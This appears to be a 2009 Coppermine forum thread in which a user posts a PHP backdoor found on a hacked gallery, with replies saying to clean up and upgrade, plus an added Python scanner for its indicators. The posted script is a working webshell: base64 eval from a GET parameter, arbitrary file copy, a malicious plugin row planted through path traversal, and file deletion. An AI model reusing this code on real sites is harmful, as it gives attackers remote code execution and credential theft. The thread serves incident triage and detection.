config.inc.php to txt - Hacking attempt?

Started by FM86, February 21, 2009, 06:03:22 PM


FM86

Hi guys!

I just realised something shocking:
I found in the copper/album directory a txt file which is an exact copy of my config.inc.php file. That means the passwords are easily readable by all the world. I've never seen this file before...
There are 2 other unknown files in this directory. One of them is a PHP file which contains the code listed at the end of this topic.
Do you have any idea what this is?

Thank you in advance!

<?
$hash="b269fc....5a1623ec7fad79df17";
if(isset($_GET["ch"])){
echo "oke";
echo "eff0";
}
if(isset($_GET["patch"])){
include("../include/config.inc.php");
mysql_connect($CONFIG["dbserver"], $CONFIG["dbuser"], $CONFIG["dbpass"]);
mysql_select_db($CONFIG["dbname"]);
//phpinfo();
$codebase_str='<?php
$hash
="b269fcfd....23ec7fad79df17";
if(
eregi("picEditor"$REQUEST_URI)||$_POST["save"]==1||isset($_POST["_REQUEST"])){
if(($_POST["hash"]!=$hash)){
die("");
}
}
?>
';

$codebase_str=str_replace("b269fcfd8...23ec7fad79df17", $hash, $codebase_str);
$fp_codebase=fopen("userpics/codebase.php", "w");
fwrite($fp_codebase, $codebase_str);
$path=__FILE__;
preg_match("/(.*)(\/.*?)/", $path, $ok);
$path=$ok[0];
$mysql_path="/../../../../../../../../../../../../..".$path."userpics";
//echo $mysql_path."\n";
$sql="INSERT INTO `".$CONFIG['TABLE_PREFIX']."plugins` ( `plugin_id` , `name` , `path` , `priority` )
VALUES (
'', 'Sumple Plugin', '$mysql_path', '0'
);";
//echo $sql;
mysql_query($sql);
echo mysql_error();

if ($handle = opendir('.')) {
while (false !== ($file = readdir($handle))) {
if ($file != "." && $file != ".." && $file!="index.php" && !eregi($hash, $file)) {
if(is_file($file)){
unlink($file);
}
}
}
$fp=fopen("index.php", "w");
fclose($fp);
closedir($handle);
}
}
if(isset($_GET["eval"])){
eval(base64_decode($_GET["eval"]));
}
if(isset($_GET["up"])){
$fp=implode(file($_GET["up_name"]));
$fp_out=fopen($_GET["down_name"], "w");
fwrite($fp_out, $fp);
}
?>

François Keller

Your gallery was hacked. Delete the unknown files (have a look at the userpics folder too) and update to the latest cpg version (cpg1.4.20).

Joachim Müller

Quote from: François Keller on February 21, 2009, 06:05:48 PM
Delete the unknown files (have a look at the userpics folder too)
That's not enough. Read the official sanitization thread "Yikes, I've been hacked! Now what?"
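
Added example (not part of the thread and not Coppermine code): a triage scan of the albums directory for the indicators visible in the posted script, namely the `eval(base64_decode($_GET[...]))` handler, the include of `config.inc.php`, a readable copy of the database credentials, and a plugin row whose path uses directory traversal. The function names are hypothetical, and it assumes that only empty `index.php` placeholders belong in the upload area and that legitimate plugin paths are plain folder names.

```python
import re
import tempfile
from pathlib import Path

# Indicators taken from the script posted in this thread.
CODE_MARKERS = [
    re.compile(rb"eval\s*\(\s*base64_decode\s*\(\s*\$_(GET|POST|REQUEST)"),
    re.compile(rb"include\s*\(\s*[\"']\.\./include/config\.inc\.php"),
    re.compile(rb"fopen\s*\(\s*\$_(GET|POST|REQUEST)"),
]
# A readable copy of config.inc.php assigns the database password key.
CONFIG_COPY = re.compile(rb"\$CONFIG\[[\"']dbpass[\"']\]\s*=")

def scan_albums(albums_dir):
    """Return sorted (relative_path, reason) findings for an albums tree."""
    findings = []
    root = Path(albums_dir)
    for path in (p for p in root.rglob("*") if p.is_file()):
        data = path.read_bytes()[:1_000_000]  # cap the bytes read per file
        rel = path.relative_to(root).as_posix()
        if CONFIG_COPY.search(data):
            findings.append((rel, "copy of config.inc.php credentials"))
        if any(m.search(data) for m in CODE_MARKERS):
            findings.append((rel, "backdoor code marker"))
        elif path.suffix.lower() == ".php" and data.strip():
            # Assumption: only empty index.php placeholders are expected here.
            findings.append((rel, "non-empty PHP file in upload area"))
    return sorted(findings)

def suspicious_plugin_path(path):
    """Assumption: legitimate plugin paths are plain folder names."""
    return ".." in path or path.startswith("/") or "\\" in path

def demo():
    """Build a constructed albums tree (sample data) and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "userpics").mkdir()
        (root / "index.php").write_bytes(b"")
        (root / "photo.jpg").write_bytes(b"\xff\xd8\xff\xe0 constructed bytes")
        (root / "notes.txt").write_text("<?php $CONFIG['dbpass'] = 'placeholder'; ?>")
        (root / "x.php").write_text('<? eval(base64_decode($_GET["eval"])); ?>')
        (root / "userpics" / "codebase.php").write_text('<?php die(""); ?>')
        return scan_albums(root)

if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{rel}: {reason}")
```

An empty result from this scan does not show that the gallery is clean; the sanitization thread referenced above still applies.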